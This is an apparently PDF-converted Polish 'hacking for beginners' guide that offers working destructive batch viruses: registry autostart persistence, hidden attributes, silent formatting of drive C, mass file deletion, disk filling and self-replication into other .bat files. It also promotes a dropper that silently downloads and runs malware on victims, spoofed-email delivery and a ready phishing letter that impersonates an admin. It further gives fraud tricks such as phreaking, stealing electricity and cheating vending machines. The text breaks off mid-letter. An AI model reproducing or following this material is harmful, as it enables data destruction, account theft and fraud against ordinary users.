background image

 
 

 

 

 

 

Hacking dla 

Hacking dla 

Hacking dla 

Hacking dla 

początkujących

początkujących

początkujących

początkujących 

 

 

 

 

 

 

 

 

 

 

 

Spis treści :

Spis treści :

Spis treści :

Spis treści : 

 

 

 

 

 

 

 

1. W

1. W

1. W

1. W notatniku

 notatniku

 notatniku

 notatniku...

...

...

... 

 

 

 

  A) 

  A) 

  A) 

  A) Pliki wsadowe .bat i ogólnie o dosie...

Pliki wsadowe .bat i ogólnie o dosie...

Pliki wsadowe .bat i ogólnie o dosie...

Pliki wsadowe .bat i ogólnie o dosie... 

 

 

 

  B) 

  B) 

  B) 

  B) Trik w .vbs

Trik w .vbs

Trik w .vbs

Trik w .vbs 

 

 

 

 

 

 

 
2.

2.

2.

2. Oszukiwanie...

 Oszukiwanie...

 Oszukiwanie...

 Oszukiwanie... 

 

 

 

  A) Co tu znajdziecie

  A) Co tu znajdziecie

  A) Co tu znajdziecie

  A) Co tu znajdziecie 

 

 

 

  B) Chomikuj bez limitów

  B) Chomikuj bez limitów

  B) Chomikuj bez limitów

  B) Chomikuj bez limitów 

 

 

 

  C) RS bez limitów

  C) RS bez limitów

  C) RS bez limitów

  C) RS bez limitów 

 

 

 

  D) Elementy phreakingu itp.

  D) Elementy phreakingu itp.

  D) Elementy phreakingu itp.

  D) Elementy phreakingu itp. 

 

 

 

 

 

 

 
3. Transp

3. Transp

3. Transp

3. Transport na komputer ofiar

ort na komputer ofiar

ort na komputer ofiar

ort na komputer ofiary... 

y... 

y... 

y...  

 

 

 

  A) Fake  mail 

  A) Fake  mail 

  A) Fake  mail 

  A) Fake  mail  

 

 

 

  B) Kurier

  B) Kurier

  B) Kurier

  B) Kurier 

 

 

 

  

  

  

   

 

 

 

4. Łamanie haseł...

4. Łamanie haseł...

4. Łamanie haseł...

4. Łamanie haseł... 

 

 

 

 

 

 

  A) Jak włamać się na konto nie

 A) Jak włamać się na konto nie

 A) Jak włamać się na konto nie

 A) Jak włamać się na konto niekoniecznie 

koniecznie 

koniecznie 

koniecznie łamaczem hase

łamaczem hase

łamaczem hase

łamaczem haseł

ł

ł

ł 

 

 

 

  B) Jak włamać się na gg

  B) Jak włamać się na gg

  B) Jak włamać się na gg

  B) Jak włamać się na gg 

 

 

 

  C) Hasła uciąŜliwych programów typu beniamin...

  C) Hasła uciąŜliwych programów typu beniamin...

  C) Hasła uciąŜliwych programów typu beniamin...

  C) Hasła uciąŜliwych programów typu beniamin... 

 

 

 

 

 

 

 
5. Nie

5. Nie

5. Nie

5. Niewykrywalność czyli zaszyfrowanie wir

wykrywalność czyli zaszyfrowanie wir

wykrywalność czyli zaszyfrowanie wir

wykrywalność czyli zaszyfrowanie wirusa

usa

usa

usa 

 

 

 

  A) Czym i jak zaszyfrować wirusa

  A) Czym i jak zaszyfrować wirusa

  A) Czym i jak zaszyfrować wirusa

  A) Czym i jak zaszyfrować wirusa 

 

 

 

  B) Efekty

  B) Efekty

  B) Efekty

  B) Efekty 

 

 

 

  C) Jak juŜ jesteśmy w niewykrywalności kilka programów

  C) Jak juŜ jesteśmy w niewykrywalności kilka programów

  C) Jak juŜ jesteśmy w niewykrywalności kilka programów

  C) Jak juŜ jesteśmy w niewykrywalności kilka programów 

 

 

 

 

 

 

 
6

6

6

6. Triki na Windowsie

. Triki na Windowsie

. Triki na Windowsie

. Triki na Windowsie 

 

 

 

  A) Niewidzialny folder...

  A) Niewidzialny folder...

  A) Niewidzialny folder...

  A) Niewidzialny folder... 

 

 

 

  B) Własny napis obok zegarka...

  B) Własny napis obok zegarka...

  B) Własny napis obok zegarka...

  B) Własny napis obok zegarka... 

 

 

 

  C) Plik o określonej

  C) Plik o określonej

  C) Plik o określonej

  C) Plik o określonej 

 

 

 przez nas wielkości w bajtach

przez nas wielkości w bajtach

przez nas wielkości w bajtach

przez nas wielkości w bajtach 

 

 

 

  D) Własn

  D) Własn

  D) Własn

  D) Własna komenda w uruchom

a komenda w uruchom

a komenda w uruchom

a komenda w uruchom 

 

 

 

 

 

 

 
7. 

7. 

7. 

7. 

 

S

S

S

Steganografia

teganografia

teganografia

teganografia czyli plik lub tekst ukryty w obrazku

 czyli plik lub tekst ukryty w obrazku

 czyli plik lub tekst ukryty w obrazku

 czyli plik lub tekst ukryty w obrazku 

 

 

 

  A) Co to jest

  A) Co to jest

  A) Co to jest

  A) Co to jest 

 

 

 s

s

s

steganografia

teganografia

teganografia

teganografia ?

 ?

 ?

 ? 

 

 

 

  B) Jak ukryć plik, tekst lub coś innego w obrazku

  B) Jak ukryć plik, tekst lub coś innego w obrazku

  B) Jak ukryć plik, tekst lub coś innego w obrazku

  B) Jak ukryć plik, tekst lub coś innego w obrazku 

 

 

 

 

 

 

 
8. Podziękowania itp.

8. Podziękowania itp.

8. Podziękowania itp.

8. Podziękowania itp. 

 

 

 

 A) Jak w temacie (podziękowania itp.)

 A) Jak w temacie (podziękowania itp.)

 A) Jak w temacie (podziękowania itp.)

 A) Jak w temacie (podziękowania itp.) 

 

 

 

 

 

 

  

 

 

 

 

 

 

 

background image

Rozdział 1 „W notatniku”

Rozdział 1 „W notatniku”

Rozdział 1 „W notatniku”

Rozdział 1 „W notatniku” 

 

 

 

 

 

 

 

A)  

A)  

A)  

A)   

 

 

 Pliki Wsadowe (.bat)...

Pliki Wsadowe (.bat)...

Pliki Wsadowe (.bat)...

Pliki Wsadowe (.bat)... 

 

 

 

 

 

 

 

1. Tworzenie pliku "bat"  
Pliki bat tworzymy w notatniku i zapisujemy z rozszerzeniem bat np. nazwa.bat .  
 
2. Polecenia   
-------------------  
@echo off  
start www.hackit.fora.pl  
------------------  
PowyŜszy programik otwiera nam stronę onet.pl moŜna po start wpisać co chcemy np  
start cos.bat otwiera plik cos.bat  
start gg.exe otwiera komunikator gg  
 
A teraz coś do wkurzenia  
----------------  
@echo off  
:metallica  
start notepad.exe  
start.cmd.exe  
goto metallica  
-----------  
Ten programik działa podobnie jak powszedni otwiera notatnik i wiersz polecenia  
ale najlepsze w nim jest to :  
 
@echo off  
:metallica     to jest tak jakby znacznikiem dla programu do których funkcji ma wrócić  
start notepad.exe  
start.cmd.exe  
goto start     goto start to jest tu najwaŜniejsze gdy program otworzy notatnik i wiersz poleceń wraca to do  
:metallica i znowu otwiera notatnik i wiersz poleceń i tak bez końca w minutę mamy otwartych ponad 600 
procesów  
----------------------  
shutdown -s -t 600 -c "ha ha ha"  
----------------------  
ta komenda zamyka nam system Windows po 10 minutach  
-s oznacza wyłączenie komputera  
-t mówi po jakim czasie ma być zamknięty komputer czas jest podawany w sekundach  
-c mówi jaki komunikat ma być wyświetlony przy wyłączaniu komputera  
zamiast -s moŜemy dać  
-r restartuje komputer  
-l wylogowuje uŜytkownika  
 
teraz dodajmy to do autostartu Ŝeby przy kaŜdym uruchomieniu komp się wyłączał  
---------------  
shutdown.exe -s -t 600  
 
@echo off  
copy %0 C:\wirus.bat  
@echo REGEDIT4 >>a.reg  
@echo. >>a.reg  
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg  
@echo "win.sys"="C:\\wirus.bat" >>a.reg  
@echo. >>a.reg  
regedit /s a.reg  
dir >nul  
del a.reg >nul  

background image

i zapisujemy to jako wirus.bat tak jak podaliśmy. Dodany wpis do rejestru będzie uruchamiał  
wirusa przy kaŜdym włączeniu kompa  
 
moŜna zamknięcie systemu wyłączyć tą komendom :  
---------------------  
shutdown.exe -a  
--------------------------  
-------------------------  
@echo off  
echo T | format c: /q  
cls  
-------------------------------  
 
to polecenie formatuje nam dysk C: w trybie szybkim i bez potwierdzenia  
T | ( system pyta czy na pewno chcemy sformatować dysk C ten kawałek odpowiada za nas twierdząco  
cls czyści ekran Ŝeby uŜytkownik nie wiedział Ŝe coś się w ogóle usuwa  
| ten znacznik tworzymy kombinacją klawiszy shift + \  
 
MoŜemy nadać teŜ naszemu wirusowi atrybuty systemowe  
np nie Będzie widoczny nawet gdy mamy załączoną opcje  
pokaŜ pliki ukryte  
------------------------------------------  
ATTRIB +S +H +R wirus.bat  
-------------------------------------------  
Atrybuty te moŜemy nadać kaŜdemu plikowi wystarczy podać jego nazwę tak jak my podaliśmy nazwę naszego 
wirusa „wirus.bat”. MoŜemy je równieŜ zdjąć zamiast + wpiszmy - i zdejmiemy z określonego pliku atrybuty 
systemowe  
 
Opóźnienie czasowe  
moŜemy sprawić by jakaś komenda lub program uruchomiła się po konkretnym czasie  
 
@echo off  
PING -n 60 127.0.0.1 >nul  
start cos.cos  
po -n wpisujemy liczbę sekund tu jest np 60  
po tym wpisujemy co ma się uruchomić  
 
teraz jakiś wirusik  
--------------------------------  
@echo off  
PING -n 2 127.0.0.1 >nul  
start cmd.exe  
PING -n 2 127.0.0.1 >nul  
start cmd.exe  
PING -n 2 127.0.0.1 >nul  
start cmd.exe  
shutdown.exe -s -t 15  
 
@echo off  
copy %0 C:\wirus.bat  
@echo REGEDIT4 >>a.reg  
@echo. >>a.reg  
@echo [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] >>a.reg  
@echo "win.sys"="C:\\wirus.bat" >>a.reg  
@echo. >>a.reg  
regedit /s a.reg  
dir >nul  
del a.reg >nul  
ATTRIB +S +H +R +A wirus.bat  

background image

 
Ten wirus otwiera najpierw co 2 sekundy wiersz polecenia  
otworzą się łącznie 3 po tym uruchamia wyłączenie kompa po 15 sekundach  
dopisuje się do rejestru i nadaje sobie atrybuty pliku systemowego czyli uŜytkownik go nie widzi  
--------------------  
del *exe* /s /q  
--------------------  
usuwa wszystkie pliki exe w trybie szybkim moŜna zamiast exe postawić kropkę wtedy usunie wszystkie pliki  
w folderze w którym się znajduje lub z dysku albo podać jakąś nazwę pliku np. dokument.txt i usunie tylko ten plik  
Pamiętajcie Ŝe del tutaj jest spacja *exe* tutaj jest spacja /s tutaj teŜ jest spacja /q  
 
---------------------------------------------------------------------------------------  
@echo off  
regedit /e ksyf  
:start  
cls  
type ksyf >> c:windows/system32/syf.dll  
goto start  
---------------------------------------------------------------------------------------  
ten bat zapełnia dysk  
 
Mówią Ŝe wirusy bat nie potrafią się rozmnaŜać w jednym artykule o nich znalazłem coś co powinno was 
zaciekawić  
--------------------------------------------------------------------  
@echo off  
ctty nul  
for %%i in (*.bat) do copy %0+%%i %%i /y >nul  
--------------------------------------------------------------------  
 
To jest sposób na doklejanie się do innego pliku bat.  
----------------------------  
type %0 >>inny.bat  
 
----------------------------  
Zamazywanie innego pliku bat swoim kodem  
 
a teraz na dokładkę kilka komend  
uruchamiamy je w formacie  
@echo off  
start i tu komenda  
(nie rozczarujecie się, nie wszystkie działają w Windows XP)  
 
user,exitwindows - zakończenie pracy Windows  
user,wnetconnectdialog - okno dialogowe Mapuj Dysk Sieciowy  
user,wnetdisconnectdialog - okno dialogowe Odłącz Dysk Sieciowy  
user,disableoemlayer - wyłącza grafikę Windows (wygląda jak zawieszenie)  
user,enableoemlayer - włącza grafikę Windows  
user,repaintscreen - odświeŜa ekran [F5]  
user,setcursorpos - kursor myszki leci w lewy-górny róg  
user,tilechildwindows - ustawia okna w rzędzie  
user,cascadechildwindows - odwrotność powyŜszego  
user,swapmousebutton - zamienia klawisze myszki  
user,setcareblinktime [n] - szybkość migania kursora  
user,setdoubleckilcktime [n] - szybkość dwukliku  
user.exe,MessageBeep - małe piknięcie  
diskcopy,DiskCopyRunDLL - okno dialogowe Kopiuj Dysk  
krnl386.exe,ExitKernel - zamknięcie sesji Kernela (bardzo szybkie zamknięcie systemu)  
mouse,disable - blokada myszki  
keyboard,disable - blokada klawiatury  

background image

shell,shellexecute - otwiera okno explorera  
shell32,OpenAS_RunDLL - okno dialogowe Otwórz z ...  
shell32,SHFormatDrive - okno dialogowe Formatuj  
shell32,ShellAboutA - info o pamięci fizycznej i zasobach  
shell32,SHexitWindowsEX 0 - wylogowanie z Windowsa (potwierdzenie)  
shell32,SHexitWindowsEX 1 - zamyka Windows (potwierdzenie)  
shell32,SHexitWindowsEX 2 - restartuje Windows  
shell32,SHexitWindowsEX 3 - restartuje powloke Windows  
shell32,Control_RunDLL - otwiera Panel Sterowania  
shell32,Control_RunDLL desk.cpl - okno właściwości ekranu  
shell32,Control_RunDLL main.cpl @0 - okno wlaściwości myszki  
shell32,Control_RunDLL main.cpl @1 - okno wlaściwości klawiatury  
shell32,Control_RunDLL main.cpl @3 - okno drukarek  
shell32,Control_RunDLL powercfg.cpl - właściwości zarządzania energią  
shell32,Control_RunDLL sysdm.cpl - okno właściwości systemu  
shell32,Control_RunDLL datetime.cpl - okno ustawień daty i czasu  
shell32,Control_RunDLL intl.cplv - okno ustawień regionalnych  
shell32,Control_RunDLL joy.cpl - okno kontrolerów gry  
shell32,Control_RunDLL sticpl.cpl - wlaściwości skanerów  
shell32,Control_RunDLL findfast.cpl - okno Find Fastu 
 
Jeszcze kilka komend ale tym razem z innej beczki : 
 
copy - wiadomo  
cls - czyści ekran  
dir - wyświetla listę plików i katalogów  
echo - "wyświetla komunikaty lub włącza i wyłącza echo poleceń"  
exit - kończy działanie programu  
find - wyszukuje ciąg tekstowy w pliku lub plikach  
findstr - wyszukuje ciągi znaków w plikach  
format - formatuje dysk  
goto - wykonuje skok do danej etykiety  
md - tworzy katalog  
pause - zatrzymuje działanie programu i czeka aŜ uŜytkownik naciśnie  
jakis klawisz  (wyświetla komunikat - Aby kontynuować naciśnij dowolny  
klawisz ..)  
pause >> null - to co powyŜej ale bez komunikatu   
rd - usuwa katalog  
ren - zmienia nazwe pliku  
start - uruchamia program lub polecenie w osobnym oknie  
time - wyświetla lub ustawia czas systemowy  
xcopy - kopiuje pliki i katalogi 
--------------------------------------------------------------------------

 

aa i moŜna jeszcze zrobić coś takiego Ŝe jak ofiara kliknie w wirka to ty dostaniesz smsa (pod warunkiem Ŝe ofiara 
ma gg) 
 
c:\progra~1\gadu-gadu\gg.exe /send:"nr telefonu" /msg:"text" 
 
---------------------------------------------

 

A jak chcemy Ŝeby wirek wykasował się po wykonaniu zadania dodajemy na końcu: del%0 
 
------------------------------- 
 
A gdy jesteście i tak ciemni w trzy to polecam generator wirusów którego moŜna ściągnąć z tąd 

www.chomikuj.pl/mikul333/Hacking

 (hasło to adres mojego forum: www.hackit.fora.pl )  

 

 

 

 

 
 

 

 

 
 

 

 

 

background image

B)   

B)   

B)   

B)   Trik w .vbs

Trik w .vbs

Trik w .vbs

Trik w .vbs 

 

 

 

 

 

 

 

W visual basicu teŜ moŜna się pobawić niestety nie znam go na tyle dobrze Ŝebym mógł powiedzieć coś 
więcej… 
 
A więc zacznijmy, nasz trik polega na wkurzającym wyskakującym okienku :D a więc nie będę się bawił 
w tłumaczenie wam jak to działa tylko podam kod : 
 

msgbox "Twoja stara jest terminatorem" ,16, "Porada dnia!"  
msgbox "UŜytkownik ma krzywe zęby" ,6, "Error"  
msgbox " Nie znaleziono klawiatury aby rozwiązać problem naciśnij dowolny klawisz" ,6, "Biond, James Biond"  
msgbox "Co się patrzysz okienka nie widziałeś" ,16, "Ej ty z wąsem"  
msgbox "A wiesz co to komputer" ,16, "Dręczące pytanie"  
msgbox "Twoja mysz uciekła w pobliŜu jest za duŜo kotów" ,6, "Pozdrowienia z wariatkowa"  
msgbox "Nie moŜna połączyć się z internetem z powodu braku połączenia się z internetem" ,6, "Błoond"  
msgbox "SELECT user_id, username, user_email, user_lang, user_birthday, user_level, user_jr FROM 
phpbb_users WHERE user_birthday <> 999999 AND user_birthday IN(13938, 13939, 13940, 13941, 13942, 
13943, 13944, error, 1, 2, 3, 4, 5, 6, error, 1, 2, 3, 4, 5, 6, error, 1, 2, 3, 4, 5, 6, 12477, 12478, 12479, 12480, 12481, 
12482, 12483, error, 1, 2, 3, 4, 5, 6, error, 1, 2, 3, 4, 5, 6, error, 1, 2, 3, 4, 5, 6, 11016, 11017, 11018, 2, 3, 4, 5, 6, 
6633, 6634, 6635, 6636, 6637, 6638, 6639, error, 1, 2, 3, 4, 5, 6, error, 1, 2, 3, 4, 5, 6, error, 1, 2, 3, 4, 5, 6, 5172, 
5173, 5174, 5175, 5176, 5177, 5178, erro Sam nie wiem co to znaczy ale wygląda fajnie" ,6, "Słucham metalu"  
msgbox "Jestem głodny włóŜ hamburgera do dysku E" ,6, "Dla mnie liczy się to Ŝe dałeś się wrobić..." 
msgbox  "Aby to wyłączyć naciśnij alt+F4" ,6, "Ostatnia nadzieja" 
msgbox  "To nie takie proste ;)" ,6, "Ha Ha Ha" 
msgbox  "Mam prośbę czy mógłbyś przyłoŜyć kartę kredytową do monitora" ,16, "Proszeee!" 
msgbox  "Poczekaj spisze numer…" ,6, "Sekundeczke…" 
msgbox  "Okey teraz juŜ mogę cię wypuścić" ,6, "Ŝegnaj…" 
 
 
Jeśli ta podłoga nie „podskoczyła i uderzyła Cię w twarz” moŜesz dopisać do tego coś jeszcze…  
 

Rozdział 2 „Oszukiwanie”

Rozdział 2 „Oszukiwanie”

Rozdział 2 „Oszukiwanie”

Rozdział 2 „Oszukiwanie” 

 

 

 

 

 

 

 
 

 

 

 

A)   

A)   

A)   

A)   Co tu znajdziecie 

Co tu znajdziecie 

Co tu znajdziecie 

Co tu znajdziecie  

 

 

 

 

Znajdziecie tu róŜne sposoby omijania limitów m. in. Rapidshara, Chomikuj (Szalenie prosty), będzie tu teŜ trochę 
o phreakingu a skończymy na trikach (np. automat z colą )  
 

B)   

B)   

B)   

B)   Chomikuj bez limitów... 

Chomikuj bez limitów... 

Chomikuj bez limitów... 

Chomikuj bez limitów...  

 

 

 

 

 

 

 

Okej, trik polega na tym by ściągać pliki mające np. 400mb mając 50 mb transferu… 
 
Co nam będzie potrzebne : Mozilla Firefox , VideoDownloadHelper 
 

1.

 

Chomikujemy wybrany plik do siebie 

2.

 

Zmieniamy rozszerzenie na mp3 

      3.    Klikamy odtwórz… 
      4.    Zamykamy chomik player 

5.

 

Jak widzimy ikonka VideoDownloadHelpera zrobiła się z czarno białej kolorowa 

6.

 

Klikamy na nią i ściągamy plik mp3 który później na naszym komputerze zmieniamy na poprzednie 
rozszerzenie 

 
Wersja filmowa : 
 

http://www.youtube.com/watch?v=6H62k-JljPQ

  

 
 

background image

C)   

C)   

C)   

C)   Rapidshare bez limitów... 

Rapidshare bez limitów... 

Rapidshare bez limitów... 

Rapidshare bez limitów...  

 

 

 

        

        

        

         

 

 

 

No więc jak mamy stałe łącze to restartuje modem i po sprawie… Jednak jak ktoś ma radiówke… 
 
Na wstępie powiem ze nie jest to Ŝądna ściema i Ŝadne nabijanie sobie punktów. Większość userow juz się 
przekonała o działaniu tego sposobu  
 
Sposób jest w pełni sprawny i co waŜne działa bardzo sprawnie. Natrafiłem kiedyś na niego podczas 
przekopywania neta .  
 
Do działania tego sposobu będzie nam potrzebna przeglądarka internetowa AOL oraz konto mailowe na 
http://www.aol.com.  
 
OK. Do roboty . Cały proces zaczynamy od pobrania tego pliku z serwera bez limitów [ waga ok. 65mb ] :  
 
->> GIGASIZE.COM ->> http://www.gigasize.com/get.php/3197074027/AOL_9.0.rar  
->> FILES.TO ->> http://www.files.to/get/283470/9z62oo5iy0  
->> RAPIDSHARE.COM ->> http://rapidshare.com/files/120813162/AOL_9.0.rar  
HASLO DO ARCHIWUM: rapidmajster .  
 
Zalecam ściąganie przeglądarki z tego linka, większość przeglądarek AOL dostępnych w necie jest juz 
zaktualizowana do nowszej wersji  
Gdy juz go pobierzemy , zabieramy się za jego instalacje.  
 
*Zaczynamy - postępujemy krok po kroku jak w opisie:  
 
Lub pobieramy VIDEOTUTORIAL ->> http://odsiebie.com/pokaz/161346---4390.html , hasło: rapidmajster (waga 
ok.40mb)  
 
1. Odpalamy instalacje - klikamy "YES",  
2. Nastepnie w oknie klikamy w "NEW MEMBERS",  
3. Nastepnie wybieramy "EXPERT SETUP",  
4. Klikamy w "ADD LOCATION",  
5. W polu wpsiujemy cokolwiek ( ja wpisalem "komp" ),  
6. Nastepnie dajemy dwa razy "NEXT",  
7. Wybieramy opcje " HOME NETWORK" i dajemy "NEXT",  
8. Po dodaniu lokacji klikamy w " Sing On to AOL Now "  
WAZNE!!!  
W tym momencie program poprosi nas o podanie danych do konta mailowego, które musimy sobie teraz załoŜyć.  
 
Wbijamy na http://www.aol.com -> klikamy w " Get Free AOL@mail " ( po prawej stronie ), i wypełniamy 
wszystkie pola. Dane nie musza być autentyczne i poprawne ale kod pocztowy tak . W okienku "POSTAL CODE" 
musimy podąć autentyczny pięcio cyfrowy kod z USA - ja podałem taki "34229", jeśli nie będzie chciał wchodzić 
to poszukajcie na googlach kodów pocztowych USA .  
 
Ostatni krok to podanie właśnie naszego nicku i hasła z wcześniej załoŜonego maila na aolu.  
 
Gdy juz to zrobimy odpali nam się przeglądarka AOL.  
 
* JAK KORZYSTAC:  
 
Zabieramy się za ściąganie przy pomocy przeglądarki AOL;  
 
1. Odpalamy przeglądarkę AOL,  
2. Zrzucamy ja sobie na pasek,  
3. Otwieramy przeglądarkę z której korzystamy na codzień np. opera, IE, firefox itp,  
4. Wklejamy do niej ( nie do AOL !!! ) link do interesującego nas pliku i zaczynamy ściąganie,  
5. Gdy ściągniemy juz parta, musimy wyłączyć przeglądarkę AOL,  
 

background image

>>WAZNE<< pod Ŝadnym pozorem nie moŜemy dopuścić do końca aktualizacji, musimy szybko kliknąć "FINISH 
LATER" - poniewaŜ bo aktualizacji sposób moŜe nie działać poprawnie  
 
Teraz ponownie odpalamy przeglądarkę AOL i powtarzamy po kolei punkty .  
 
     *Dodatkowe informacje :  
 
Nie trzeba resetować AoL'a po kaŜdym parcie wystarczy nacisnąć opcje  
Sign Off −−> Switch Screen Name  
 
wyskoczy nam okienko gdzie dusimy switch  
 
AOL pokazuje jeszcze tylko komunikat ile byliśmy w sieci dajemy ok  
        
a później słyszymy juŜ znajome welcome i ściągamy dalej  
sposób jest krótszy niŜ restart przeglądarki i nie trzeba się za kaŜdym razem męczyć z aktualizacja  
 
Metoda by CyberShot 
  

 

D)  

D)  

D)  

D)   

 

 

 Triki i Elementy phreackingu 

Triki i Elementy phreackingu 

Triki i Elementy phreackingu 

Triki i Elementy phreackingu  

 

 

 

 

 

 

 

Z komórki za darmo  
 
Chcesz dzwonić z komórki za darmo ? Nic trudnego.  
Robimy tak  
1. wybieramy numer  
2. naciśnij yes  
3. gdy wyświetla sie napis connecting naciśnij CLR  
4. naciśnij 0  
5. potem #  
6. teraz dwa razy NO  
 
I to wszystko jak chcesz się rozłączyć wyjmij baterie  
 
Chcesz darmowy internet  
 
Potrzebne ci są callbacki czyli takie numery, które wpisane do połączenia dzwonią za darmo tylko, Ŝe cię łatwo 
namierzyć. Oto kilka  
1.0800202122 login: ? hasło: ?  
2.080020127 login: ? hasło: ?  
3.080020019 login: unknown hasło: unknown  
4.080020023 login: ? hasło: ?  
5.080020866 - login: ppp ; hasło: ppp  
6.080020866 - login: koliber ; hasło: koliber  
7.080020034 - login: adam2 ; hasło: b34fro  
8.080020041 - login: unknown ; hasło: unknown  
 
Od razu mówię, Ŝe niektóre nie działają podobno jak nie działają naleŜy przed numerem postawić 48. UwaŜaj, bo 
jak z domu dzwonisz to cię namierzą.  
 
FREE  
 
Dzwonisz na darmowy numer państwowy np: 997  
Rozłączasz się i wykręcasz od razu nowy numer  
Gadasz ile wlezie (Rzadko działa)   
 
Ś

wiatło za 2 złote  

To jest prosty sposób ale działa tylko na blokach musimy pociągnąć kabel z piwnicy i płacimy za światło 
symboliczne pieniądze.  

background image

Darmowy sms  
 
Jak masz komóre to moŜesz posyłać darmowe sms. Jak wysyłasz sms to są takie dwie koperty które wędrują jakieś 
3-4 razy jak wędruje pierwszy raz i jest przy samym końcu wyłącz komórke a sms przyjdzie za darmo. Działa na 
simensach !!!  
 
Jak zdenerwować telekomune  
 
Dzwonimy na 0800 100 200 i mówi nam babka z telekomuny dzień dobry....a my do nich dlaczego wasi klienci 
mówią na was "telekomuna" babka zbladła i mówi, Ŝe tu na ten temat się nie rozmawia   
 
Darmowa coca-cola  
 
Podchodzimy do automatu z coli i wrzucamy 20 zł ale starych, automat wyrzuca cole i wydaje z 5 zł (starymi 
pieniędzmi moŜna teŜ oszukiwać w maszynach hazardowych (im starsza tym lepsza) wrzucamy nic nie warte stare 
20zł i wygrywamy)  
 
Płyty pirackie za darmo  
 
Idziemy do pirata i zamawiamy płytkie jaką chcemy. Teraz daje nam ją i mówimy "biorę ją za darmo, bo jak nie to 
was kapne" i działa.  
 
Jednoimpulsówki  
 
Robimy tak podchodzimy do budki i wciskamy 0803 teraz czekamy 25 sygnałów (więcej nie będzie) i gdy jest 
ostatni to przy samym końcu wciskamy 0 teraz czekamy aŜ będzie cisza i wystukujemy jaki numer chcemy ale 
mamy 1 impuls i jeszcze jedno działa na srebrnych urmetach u mnie są tylko takie prócz z telefoniki na CHIP. O 
jak dzwonisz na komórkę to masz zaledwie 13 sekund.  
 
Coś innego  
 
Jak dzwonimy to gdy mamy na wyświetlaczu 0 impulsów wciskamy 0 i gadamy ile chcemy. Proste jak drut 
kolczasty.  
 
Opis tone dilera  
 
Co to jest tone diler ? Nie będę tu dokładnie się zagłębiać w temacie  Jest to po prostu system odsłuchujący do 
sekretarek firmy Panasonic. Jest wielkości 10*7. Jest to taka czarna skrzynka z klawiaturą. MoŜna go kupić w 
większych miastach za 22 zł + vat. To i tak niska cena dlatego, Ŝe się to zwróci. Te urządzenie ma wszechstronne 
zastosowanie. Dzięki niemu moŜemy za darmo dzwonić z budek !!! Z tone dilerkiem moŜna wszystko. Tak przy 
okazji moŜna go złoŜyć samemu ale jeśli się nie znasz na elektronice to ci nie polecam, bo po złoŜeniu w 90 % 
przypadkach nie działał a forsa do kubła, więc lepiej go kupić  Generuje częstotliwość 220 Hz i dzięki temu 
dzwonimy za darmo. Opisu jak z jego uŜyciem dzwonić za darmo moŜecie poszukać na super stronie : 
www.google.pl 
 
a teraz coś zupełnie z innej beczki...  
 
Jest pewien fajny sposób na wodomierze  
Zatykasz wylot z wanny korkiem  
Otwierasz kran tak Ŝeby woda powoli kapała, lecz nie za wolno  
Wychodzisz z domu 
Gdy wrócisz wanna będzie pełna wody  
A wodomierz przesunie się najwyŜej o kawałeczek lub wcale ;] 
 
 
By spinacz  
 
 
 

background image

 

Rozdział 3 „Transport na komputer of

Rozdział 3 „Transport na komputer of

Rozdział 3 „Transport na komputer of

Rozdział 3 „Transport na komputer ofiary...”

iary...”

iary...”

iary...” 

 

 

 

 

 

 

 
A)   

A)   

A)   

A)   Fake mail

Fake mail

Fake mail

Fake mail 

 

 

 

 
Czy gdybyś dostał e-maila od nieznajomej osoby otworzyłbyś załącznik lub kliknąłbyś w link w tej wiadomości? Z 
pewnością nie. Od razu uznałbyś taką wiadomość za spam.....  
Czy gdybyś dostał e-maila od przyjaciela, kolegi, przełoŜonego z pracy otworzyłbyś załącznik lub kliknąłbyś w 
link w tej wiadomości? Z pewnością tak! PrzecieŜ znasz tę osobę i jej ufasz! 
 
No więc na tym polega fake mail… Jest kilka sposobów (3 jest najpewniejszy ) 
 
Sposób 1  

http://www.fakemailer.net/

 …tyle Ŝe nie moŜna dawać załączników...  

 
Jeśli nie zadziała  
 
Sposób 2  
Jak chcesz wysłać komuś z Outlloca fałszywego to robisz tak. Masz jakieś konto teraz dajesz narzędzia −> konta 
−> poczta i właściwości. W polu nazwa wpisujesz byle co. W polu e-mail wpisujesz co chcesz np. root@wp.pl i to 
wszystko teraz moŜesz z niego wysyłać fałszywe e-maile, tyle Ŝe w nagłówku będzie twój IP ;(  
 
Sposób 3  
UŜyć programów które są na moim chomiku (proste w obsłudze szybki no i nabijacie mi punkty xD ) 

http://chomikuj.pl/Mikul333/Hacking

 (hasło: www.hackit.fora.pl) 

 

B)   

B)   

B)   

B)   Kurier

Kurier

Kurier

Kurier 

 

 

 

 

 

 

 

Kurier program który słuŜy do dostarczania i uruchamiania niebezpiecznych aplikacji na komputerze ofiary. 
Wysyłamy kuriera do ofiary, ofiara go uruchamia, kurier pobiera z wcześniej wpisanego linku określony 
niebezpieczny program na komputer ofiary i uruchamia go bez jej wiedzy. 
MoŜna go ściągnąć z mojego chomika : 
       

http://chomikuj.pl/Mikul333/Hacking

 (hasło: www.hackit.fora.pl) 

 

 

 

 

Rozdział 4 „Łamanie haseł...”

Rozdział 4 „Łamanie haseł...”

Rozdział 4 „Łamanie haseł...”

Rozdział 4 „Łamanie haseł...” 

 

 

 

 

 

 

 
A)

A)

A)

A)  

  

  

   

 

 

 Jak włamać się na konto nie koniecznie łamaczem haseł

Jak włamać się na konto nie koniecznie łamaczem haseł

Jak włamać się na konto nie koniecznie łamaczem haseł

Jak włamać się na konto nie koniecznie łamaczem haseł 

 

 

 

 
Sposób 1 
 
Zgadujemy hasło ( mało skuteczna metoda xD )  
 
Sposób 2 
 
Sprawdzamy pytanie pomocnicze i wysyłamy pytanie do lamy z prośbą o odpowiedź ( oczywiście nie tak od razu 
nawiąŜmy znajomość a potem z nikąd z nizowąd się spytajmy )  
 
Na republikę prosto się tak włamać...  
 
a jak mamy do czynienia z powiedzmy 10-13 latkiem w czego nie nawidzisz jeść wpisujemy szpinaku i chodzimy 
po jego koncie… 
 
Sposób 3 

 

Podszywamy się pod admina i grzecznie prosimy o login i hasło (wytłumaczając np. utraceniem danych przez 
przeciąŜenia serwera itp.)  
 

background image

 
Macie nawet gotowy list: 
 
Szanowni Państwo  
 
W związku z nasilającymi próbami się włamań na nasz serwer_nazwa informujemy państwo,  
Ŝ

e zmieniamy system kodowania haseł / w związku licznym zakładaniem kont, które  

nie są przez nikogo uŜywane||zwracamy się z gorącą prośbą o przesłanie poniŜszego  
formularza na ten adres. PoniŜszy formularz ma na celu zweryfikowanie, czy  
